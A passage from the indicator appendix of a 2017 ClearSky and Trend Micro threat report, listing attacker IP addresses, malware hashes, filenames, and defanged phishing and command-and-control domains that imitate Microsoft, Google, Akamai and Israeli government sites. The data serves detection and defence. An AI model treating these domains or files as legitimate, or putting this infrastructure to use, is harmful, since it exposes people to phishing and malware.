80.179.42.37 
80.179.42.44 
176.31.18.29 
188.165.69.39 
51.254.76.54 
158.69.150.163 
192.99.242.212 
198.50.214.62 
a60a32f21ac1a2ec33135a650aa8dc71 
94ba33696cd6ffd6335948a752ec9c19 
bcae706c00e07936fc41ac47d671fc40 
1ca03f92f71d5ecb5dbf71b14d48495c 
506415ef517b4b1f7679b3664ad399e1 
1ca03f92f71d5ecb5dbf71b14d48495c 
bd38cab32b3b8b64e5d5d3df36f7c55a 
ac29659dc10b2811372c83675ff57d23 
41466bbb49dd35f9aa3002e546da65eb 
8f6f7416cfdf8d500d6c3dcb33c4f4c9e1cd33998c957fea77fbd50471faec88 
02f2c896287bc6a71275e8ebe311630557800081862a56a3c22c143f2f3142bd 
2df6fe9812796605d4696773c91ad84c4c315df7df9cf78bee5864822b1074c9 
55f513d0d8e1fd41b1417a0eb2afff3a039a9529571196dd7882d1251ab1f9bc 
da529e0b81625828d52cd70efba50794 
1f9910cafe0e5f39887b2d5ab4df0d10 
0feb0b50b99f0b303a5081ffb3c4446d 
577577d6df1833629bfd0d612e3dbb05 
165f8db9c6e2ca79260b159b4618a496e1ed6730d800798d51d38f07b3653952 
1f867be812087722010f12028beeaf376043e5d7 
b571c8e0e3768a12794eaf0ce24e6697 
e319f3fb40957a5ff13695306dd9de25 
acf24620e544f79e55fd8ae6022e040257b60b33cf474c37f2877c39fbf2308a 
8c8496390c3ad048f2a0a4031edfcdac819ee840d32951b9a1a9337a2dcbea25 
c5a02e984ca3d5ac13cf946d2ba68364 
efca6664ad6d29d2df5aaecf99024892 
bff115d5fb4fd8a395d158fb18175d1d183c8869d54624c706ee48a1180b2361 
afa563221aac89f96c383f9f9f4ef81d82c69419f124a80b7f4a8c437d83ce77 
4a3d93c0a74aaabeb801593741587a02 
64c9acc611ef47486ea756aca8e1b3b7 
fb775e900872e01f65e606b722719594 
cf8502b8b67d11fbb0c75ebcf741db15 
4999967c94a2fb1fa8122f1eea7a0e02 
5fe0e156a308b48fb2f9577ed3e3b09768976fdd99f6b2d2db5658b138676902 
37449ddfc120c08e0c0d41561db79e8cbbb97238 
4442c48dd314a04ba4df046dfe43c9ea1d229ef8814e4d3195afa9624682d763 
7651f0d886e1c1054eb716352468ec6aedab06ed61e1eebd02bca4efbb974fb6 
eb01202563dc0a1a3b39852ccda012acfe0b6f4d 
7e3c9323be2898d92666df33eb6e73a46c28e8e34630a2bd1db96aeb39586aeb 
9e5ab438deb327e26266c27891b3573c302113b8d239abc7f9aaa7eff9c4f7bb 

©All rights reserved to ClearSky cyber security and Trend Micro, 2017 

Page 41 of 48 

 

Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Hash 
Filename 
Filename 
Filename 
Filename 
Filename 
Filename 
Filename 
Filename 
Filename 
Filename 

 

 

6a19624d80a54c4931490562b94775b74724f200 
32860b0184676509241bbaf9233068d472472c3d9c93570fc072e1acea97a1d4 
b34721e53599286a1093c90a9dd0b789 
7ad65e39b79ad56c02a90dfab8090392ec5ffed10a8e276b86ec9b1f2524ad31 
59c448abaa6cd20ce7af33d6c0ae27e4a853d2bd 
fb775e900872e01f65e606b722719594 
871efc9ecd8a446a7aa06351604a9bf4 
cf8502b8b67d11fbb0c75ebcf741db15 
a4dd1c225292014e65edb83f2684f2d5 
838fb8d181d52e9b9d212b49f4350739 
e37418ba399a095066845e7829267efe 
1072b82f53fdd9fa944685c7e498eece89b6b4240073f654495ac76e303e65c9 
752240cddda5acb5e8d026cef82e2b54 
435a93978fa50f55a64c788002da58a5 
3de91d07ac762b193d5b67dd5138381a 
a4adbea4fcbb242f7eac48ddbf13c814d5eec9220f7dce01b2cc8b56a806cd37 
aba7771c42aea8048e4067809c786b0105e9dfaa 
b01e955a34da8698fae11bf17e3f79a054449f938257284155aeca9a2d3815dd 
3676914af9fd575deb9901a8b625f032 
f1607a5b918345f89e3c2887c6dafc05c5832593 
341c920ec47efa4fd1bfcd1859a7fb98945f9d85 
8b702ba2b2bd65c3ad47117515f0669c 
6ea02f1f13cc39d953e5a3ebcdcfd882 
8f77a9cc2ad32af6fb1865fdff82ad89 
62f8f45c5f10647af0040f965a3ea96d 
d9aa197ca2f01a66df248c7a8b582c40 
217b1c2760bcf4838f5e3efb980064d7 
cfb4be91d8546203ae602c0284126408 
16a711a8fa5a40ee787e41c2c65faf9a78b195307ac069c5e13ba18bce243d01 
5e65373a7c6abca7e3f75ce74c6e8143 
d3b9da7c8c54f7f1ea6433ac34b120a1 
32261fe44c368724593fbf65d47fc826 
d2c117d18cb05140373713859803a0d6 
113ca319e85778b62145019359380a08 
4999967c94a2fb1fa8122f1eea7a0e02 
9846b07bf7265161573392d24543940e 
bf23ce4ae7d5c774b1fa6becd6864b3b 
720203904c9eaf45ff767425a8c518cd 
62652f074924bb961d74099bc7b95731 
1fba1876c88203a2ae6a59ce0b5da2a1 
cf8502b8b67d11fbb0c75ebcf741db15 
fb775e900872e01f65e606b722719594 
73f14f320facbdd29ae6f0628fa6f198dc86ba3428b3eddbfc39cf36224cebb9 
3d2885edf1f70ce4eb1e9519f47a669f 
config.exe 
Strike.doc 
malware.doc 
PDFOPENER_CONSOLE.exe 
Ma_1.tmp 
Wextract 
The%20United%20Nations%20Counter.doc.docx 
netsrvs.exe 
Date.dotm 
ssl.docx 

©All rights reserved to ClearSky cyber security and Trend Micro, 2017 

Page 42 of 48 

 

Filename 
Filename 
Filename 
Filename 
Filename 
Filename 
Filename 
Filename 
Filename 
Filename 
Filename 
Filename 
Filename 
Filename 
Filename 
Filename 
Filename 
Filename 
Filename 
Filename 
Filename 
Filename 
Filename 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 

 

 

o040t.exe 
m8f7s.exe 
d5tjo.exe 
LogManager.tmp 
edg1CF5.tmp 
ntuser.swp 
svchost64.swp 
ntuser.dat.swp 
455aa96e-804g-4bcf-bcf8-f400b3a9cfe9.PackageExtraction 
Svchost32.swp 
Svchost64.swp 
update5x.dll 
22092014_ver621.dll      
netsrv.exe 
netsrva.exe 
netsrvd.exe 
netsrvs.exe 
vminst.tmp 
tdtess.exe 
test_oracle.xls 
ur96r.exe 
The North Korean weapons program now testing USA range.docx 
F123321.exe 
wethearservice[.]com 
mywindows24[.]in 
microsoft-office[.]solutions 
code[.]jguery[.]net 
1m100[.]tech 
cloudflare-statics[.]com 
cachevideo[.]com 
winfeedback[.]net 
terendmicro[.]com 
alkamaihd[.]com 
msv-updates[.]gsvr-static[.]co 
fbstatic-a[.]space 
broadcast-microsoft[.]tech 
sharepoint-microsoft[.]co 
newsfeeds-microsoft[.]press 
owa-microsoft[.]online 
digicert[.]online 
cloudflare-analyse[.]com 
israelnewsagency[.]link 
akamaitechnology[.]tech 
winupdate64[.]org 
ads-youtube[.]net 
cortana-search[.]com 
nsserver[.]host 
nameserver[.]win 
symcd[.]xyz 
fdgdsg[.]xyz 
dnsserv[.]host 
winupdate64[.]com 
ssl-gstatic[.]online 
updatedrivers[.]org 

©All rights reserved to ClearSky cyber security and Trend Micro, 2017 

Page 43 of 48 

 

Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 

 

 

alkamaihd[.]net 
update[.]microsoft-office[.]solutions 
javaupdate[.]co 
outlook360[.]org 
winupdate64[.]net 
trendmicro[.]tech 
qoldenlines[.]net 
windefender[.]org 
1e100[.]tech 
chromeupdates[.]online 
ads-youtube[.]online 
akamaitechnology[.]com 
cloudmicrosoft[.]net 
js[.]jguery[.]online 
azurewebsites[.]tech 
elasticbeanstalk[.]tech 
jguery[.]online 
microsoft-security[.]host 
microsoft-ds[.]com 
jguery[.]net 
primeminister-goverment-techcenter[.]tech 
officeapps-live[.]com 
microsoft-tool[.]com 
cissco[.]net 
js[.]jguery[.]net 
f-tqn[.]com 
javaupdator[.]com 
officeapps-live[.]net 
ipresolver[.]org 
intelchip[.]org 
outlook360[.]net 
windowkernel[.]com 
wheatherserviceapi[.]info 
windowslayer[.]in 
sdlc-esd-oracle[.]online 
mpmicrosoft[.]com 
officeapps-live[.]org 
cachevideo[.]online 
win-update[.]com 
labs-cloudfront[.]com 
windowskernel14[.]com 
fbstatic-akamaihd[.]com 
mcafee-analyzer[.]com 
cloud-analyzer[.]com 
fb-statics[.]com 
ynet[.]link 
twiter-statics[.]info 
diagnose[.]microsoft-office[.]solutions 
mswordupdate17[.]com 
gsvr-static[.]co 
news-bbc[.]press 
mandalasanati[.]info 
office-msupdate[.]solutions 
windows-updates[.]solutions 

©All rights reserved to ClearSky cyber security and Trend Micro, 2017 

Page 44 of 48 

 

Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
Domain 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 

DNSName 

 

 

akamai-net[.]network 
azureedge-net[.]services 
doucbleclick[.]tech 
windows-updates[.]services 
windows-updates[.]network 
cloudfront[.]site 
netcdn-cachefly[.]network 
akamaized[.]online 
cdninstagram[.]center 
googlusercontent[.]center 
ea-in-f354[.]1e100[.]ads-youtube[.]net 
ns1[.]ynet[.]link 
ns2[.]ynet[.]link 
static[.]dyn-usr[.]g-blc-se[.]d45[.]a63[.]akamai[.]be-5-0-ibr01-lts-ntwk-msn[.]alkamaihd[.]com 
pht[.]is[.]nlb-deploy[.]edge-dyn[.]e11[.]f20[.]ads-youtube[.]online 
ns1[.]winfeedback[.]net 
ns2[.]winfeedback[.]net 
msupdate[.]diagnose[.]microsoft-office[.]solutions 
www[.]alkamaihd[.]net 
c20[.]jdk[.]cdn-external-ie[.]1e100[.]alkamaihd[.]net 
ns2[.]img[.]twiter-statics[.]info 
api[.]img[.]twiter-statics[.]info 
ns1[.]img[.]twiter-statics[.]info 
ns1[.]officeapps-live[.]net 
ns1[.]wheatherserviceapi[.]info 
ns2[.]microsoft-tool[.]com 
ns2[.]f-tqn[.]com 
carl[.]ns[.]cloudflare[.]com[.]sdlc-esd-oracle[.]online 
ns1[.]cortana-search[.]com 
40[.]dc[.]c0ad[.]ip4[.]dyn[.]gsvr-static[.]co 
40[.]dc[.]c2ad[.]ip4[.]dyn[.]gsvr-static[.]co 
ns2[.]winupdate64[.]org 
ns1[.]f-tqn[.]com 
ns2[.]cortana-search[.]com 
ns1[.]symcd[.]xyz 
ns2[.]symcd[.]xyz 
ns1[.]winupdate64[.]org 
ns1[.]microsoft-tool[.]com 
ns2[.]officeapps-live[.]com 
ns1[.]israelnewsagency[.]link 
ns2[.]israelnewsagency[.]link 
ns1[.]cissco[.]net 
ns2[.]cissco[.]net 
ns1[.]cachevideo[.]online 
ns2[.]cachevideo[.]online 
www[.]static[.]dyn-usr[.]g-blc-se[.]d45[.]a63[.]akamai[.]alkamaihd[.]com 
static[.]dyn-usr[.]g-blc-se[.]d45[.]a63[.]akamai[.]www[.]alkamaihd[.]com 
dhb[.]stage[.]12735072[.]40[.]dc[.]c0ad[.]ip4[.]sta[.]gsvr-static[.]co 
main[.]windowskernel14[.]com 
www[.]winupdate64[.]net 
ae13-0-hk2-96cbe-1a-ntwk-msn[.]static[.]dyn-usr[.]g-blc-
se[.]d45[.]a63[.]akamai[.]alkamaihd[.]com 
be-5-0-ibr01-lts-ntwk-msn[.]static[.]dyn-usr[.]g-blc-se[.]d45[.]a63[.]akamai[.]alkamaihd[.]com 

©All rights reserved to ClearSky cyber security and Trend Micro, 2017 

Page 45 of 48 

 

DNSName 

DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 

 

 

static[.]dyn-usr[.]g-blc-se[.]d45[.]a63[.]akamai[.]static[.]dyn-usr[.]g-blc-
se[.]d45[.]a63[.]akamai[.]alkamaihd[.]com 
cyb[.]stage[.]12735072[.]40[.]dc[.]c0ad[.]ip4[.]sta[.]gsvr-static[.]co 
ns1[.]winupdate64[.]com 
ns1[.]twiter-statics[.]info 
40[.]dc[.]c0ad[.]ip4[.]dyn[.]gsvr-static[.]co 
update[.]microsoft-office[.]solutions 
wk-in-f104[.]1e100[.]n[.]microsoft[.]qoldenlines[.]net 
ns1[.]fb-statics[.]com 
ns2[.]fb-statics[.]com 
is-cdn[.]edge[.]g18[.]dyn[.]usr-e12-as[.]akamaitechnology 
img[.]gmailtagmanager[.]com 
wk-in-f104[.]1c100[.]n[.]microsoft-security[.]host 
msnbot-sd7-46-cdn[.]microsoft-security[.]host 
msnbot-sd7-46-img[.]microsoft-security[.]host 
ns2[.]winupdate64[.]com 
msnbot-sd7-46-194[.]microsoft-security[.]host 
ea-in-f155[.]1e100[.]microsoft-security[.]host 
msnbot-207-46-194[.]microsoft-security[.]host 
img[.]twiter-statics[.]info 
msnbot-sd7-46-cdn[.]microsoft-security[.]host 
ns2[.]wheatherserviceapi[.]info 
ns1[.]windowkernel[.]com 
ns2[.]windowkernel[.]com 
ns2[.]fbstatic-a[.]space 
ns1[.]fbstatic-a[.]space 
api[.]TwitEr-Statics[.]info 
ns2[.]mcafee-analyzer[.]com 
21666[.]mpmicrosoft[.]com 
22830[.]officeapps-live[.]org 
15236[.]mcafee-analyzer[.]com 
ns2[.]static[.]dyn-usr[.]gsrv02[.]ssl-gstatic[.]online 
ns1[.]mcafee-analyzer[.]com 
ns1[.]fbstatic-akamaihd[.]com 
ns1[.]static[.]dyn-usr[.]gsrv01[.]ssl-gstatic[.]online 
ns2[.]officeapps-live[.]org 
wk-in-f104[.]1e100[.]n[.]microsoft-security[.]host 
ns1[.]mpmicrosoft[.]com 
www[.]microsoft-security[.]host 
ns2[.]fbstatic-akamaihd[.]com 
ns1[.]cachevideo[.]online 
wk-in-f100[.]1e100[.]n[.]microsoft-security[.]host 
ns1[.]officeapps-live[.]org 
ns2[.]mpmicrosoft[.]com 
ns02[.]nsserver[.]host 
ns2[.]cachevideo[.]online 
be-5-0-ibr01-lts-ntwk-msn[.]alkamaihd[.]com 
static[.]dyn-usr[.]g-blc-se[.]d45[.]a63[.]akamai[.]alkamaihd[.]com 
www[.]alkamaihd[.]com 
ae13-0-hk2-96cbe-1a-ntwk-msn[.]alkamaihd[.]com 
ns2[.]microsoft-ds[.]com 
adcenter[.]microsoft-ds[.]com 
ns1[.]microsoft-ds[.]com 
ns1[.]mswordupdate17[.]com 

©All rights reserved to ClearSky cyber security and Trend Micro, 2017 

Page 46 of 48 

 

DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 

 

 

ns2[.]mswordupdate17[.]com 
c[.]mswordupdate17[.]com 
ns1[.]cloudflare-analyse[.]com 
static[.]dyn-usr[.]f-loginme[.]c19[.]a23[.]akamaitechnology[.]com 
ns2[.]cloudflare-analyse[.]com 
ns1[.]cloud-analyzer[.]com 
ns2[.]cloud-analyzer[.]com 
ns01[.]nsserver[.]host 
ns1[.]fb-statics[.]com 
ns02[.]dnsserv[.]host 
15236[.]cachevideo[.]online 
ns2[.]fb-statics[.]com 
ns2[.]twiter-statics[.]info 
ea-in-f113[.]1e100[.]microsoft-security[.]host 
static[.]dyn-usr[.]f-login-me[.]c19[.]a[.]akamaitechnology[.]tech 
ea-in-f155[.]1e100[.]microsoft-security[.]host 
float[.]2963[.]bm-imp[.]akamaitechnology[.]tech 
ns1[.]mcafee-analyzer[.]com 
ns2[.]mcafee-analyzer[.]com 
ns1[.]mpmicrosoft[.]com 
ns2[.]mpmicrosoft[.]com 
jpsrv-java-jdkec1[.]javaupdate[.]co 
microsoft-active[.]directory_update-change-policy[.]primeminister-goverment-techcenter[.]tech 
jpsrv-java-jdkec3[.]javaupdate[.]co 
nameserver02[.]javaupdate[.]co 
jpsrv-java-jdkec2[.]javaupdate[.]co 
static[.]dyn-usr[.]f-login-me[.]c19[.]a23[.]akamaitechnology[.]com 
static[.]dyn-usr[.]g-blc-se[.]d45[.]a63[.]alkamaihd[.]net 
ssl[.]pmo[.]gov[.]il-dana-naauthurl1-welcome[.]cgi[.]primeminister-goverment-techcenter[.]tech 
ns1[.]static[.]dyn-usr[.]gsrv01[.]ssl- gstatic[.]online 
ns2[.]static[.]dyn-usr[.]gsrv02[.]ssl- gstatic[.]online 
static[.]primeminister-goverment-techcenter[.]tech 
ns1[.]outlook360[.]org 
d45[.]a63[.]alkamaihd[.]net 
ns1[.]officeapps-live[.]org 
ns2[.]outlook360[.]org 
ns2[.]officeapps-live[.]org 
ns2[.]win-update[.]com 
aaa[.]stage[.]14043411[.]email[.]sharepoint-microsoft[.]co 
ns1[.]updatedrivers[.]org 
a17-h16[.]g11[.]iad17[.]as[.]pht-external[.]c15[.]qoldenlines[.]net 
ns1[.]windefender[.]org 
is-cdn[.]edge[.]g18[.]dyn[.]usr-e12-as[.]akamaitechnology[.]com 
ns2[.]windefender[.]org 
ns1[.]win-update[.]com 
ns2[.]updatedrivers[.]org 
ns1[.]mpmicrosoft[.]com 
ns1[.]officeapps-live[.]org 
ns2[.]officeapps-live[.]org 
ns2[.]ipresolver[.]org 
ns1[.]ipresolver[.]org 
www[.]is-cdn[.]edge[.]g18[.]dyn[.]usr-e12-as[.]akamaitechnology[.]com 
11716[.]cachevideo[.]com 
ns1[.]intelchip[.]org 

©All rights reserved to ClearSky cyber security and Trend Micro, 2017 

Page 47 of 48 

 

DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 
DNSName 

 

 

 

ns2[.]cachevideo[.]com 
7737[.]cloudflare-statics[.]com 
7052[.]cloudflare-statics[.]com 
7737[.]digicert[.]online 
ns1[.]cloudflare-statics[.]com 
24984[.]cachevideo[.]com 
ns1[.]digicert[.]online 
ns2[.]digicert[.]online 
24984[.]digicert[.]online 
ns1[.]fbstatic-akamaihd[.]com 
ns2[.]fbstatic-akamaihd[.]com 
ns1[.]javaupdator[.]com 
ns2[.]outlook360[.]net 
ns01[.]nameserver[.]win 
ns2[.]javaupdator[.]com 
ns2[.]intelchip[.]org 
TATIC[.]DYN-USR[.]GSRV01[.]SSL-GSTATIC[.]ONLINe 
STATIC[.]DYN-USR[.]GSRV01[.]SSL-GSTATIC[.]online 
ns1[.]labs-cloudfront[.]com 
ns2[.]labs-cloudfront[.]com 
www[.]broadcast-microsoft[.]tech 
www[.]newsfeeds-microsoft[.]press 
www[.]owa-microsoft[.]online 
static[.]c20[.]jdk[.]cdn-external-ie[.]1e100[.]tech 
ns1[.]cloud-analyzer[.]com 
ns2[.]cloud-analyzer[.]com 
ns2[.]cloudflare-statics[.]com 
ns1[.]cachevideo[.]com 
ns1[.]outlook360[.]net 
3012[.]digicert[.]online 
24984[.]cloudflare-statics[.]com 
7737[.]cachevideo[.]com 
hda[.]stage[.]12735072[.]40[.]dc[.]c0ad[.]ip4[.]sta[.]gsvr-static[.]co 
msdn[.]winupdate64[.]net 
kja[.]stage[.]12735072[.]40[.]dc[.]c0ad[.]ip4[.]sta[.]gsvr-static[.]co 

©All rights reserved to ClearSky cyber security and Trend Micro, 2017 

Page 48 of 48 

